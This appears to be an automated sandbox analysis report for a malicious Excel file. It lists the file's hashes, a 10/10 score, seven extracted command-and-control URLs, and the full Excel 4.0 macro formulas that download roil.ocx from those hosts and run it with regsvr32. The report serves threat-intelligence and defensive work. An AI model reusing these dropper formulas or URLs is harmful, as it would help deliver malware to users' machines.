General

  • Target

    8c1d4929313b7edeeefda1db51f3025afd4f06d79cf2d5469b296bf5d7af62f2

  • Size

    38KB

  • Sample

    241120-ptz3dawgmd

  • MD5

    287338caae03f3942c8bc5479ac9aa53

  • SHA1

    a8b9c13540eadd9364f9b5be932cdba953ea43d3

  • SHA256

    8c1d4929313b7edeeefda1db51f3025afd4f06d79cf2d5469b296bf5d7af62f2

  • SHA512

    711a8d450cd037f855a5e5a37bd796fe4091b8e77d3ce10cb8a2252052df1e9df8891b27eaf28335ece59f39a60723223dae45c196426fac51d5a0a93d24590e

  • SSDEEP

    768:5snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:yA6gvOZZ1ZYpoQ/pMAeVIyP54T

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/

https://franciscosobrado.com/wp-content/xp/

https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/

https://www.curtisse.com/wordpress/kXUx9P38X/

https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/

https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/","..\roil.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://londoninsurancelife-lmg.com/wp-content/HukqubgSP/","..\roil.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://franciscosobrado.com/wp-content/xp/","..\roil.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://britainsolicitors.com/wp-admin/disNolZkYooJTascNDEk/","..\roil.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.curtisse.com/wordpress/kXUx9P38X/","..\roil.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bsprabodhini.org/wp-content/i1e8aSEloGChNad3m/","..\roil.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://toyota-4wd.com/wp-content/55d3MMJGg6CMSFhS/","..\roil.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\roil.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://landingpageis.com/alfacgiapi/IhZmV1LIJwi6O/

Targets

    • Target

      8c1d4929313b7edeeefda1db51f3025afd4f06d79cf2d5469b296bf5d7af62f2

    • Size

      38KB

    • MD5

      287338caae03f3942c8bc5479ac9aa53

    • SHA1

      a8b9c13540eadd9364f9b5be932cdba953ea43d3

    • SHA256

      8c1d4929313b7edeeefda1db51f3025afd4f06d79cf2d5469b296bf5d7af62f2

    • SHA512

      711a8d450cd037f855a5e5a37bd796fe4091b8e77d3ce10cb8a2252052df1e9df8891b27eaf28335ece59f39a60723223dae45c196426fac51d5a0a93d24590e

    • SSDEEP

      768:5snACdQR84jOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIX:yA6gvOZZ1ZYpoQ/pMAeVIyP54T

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks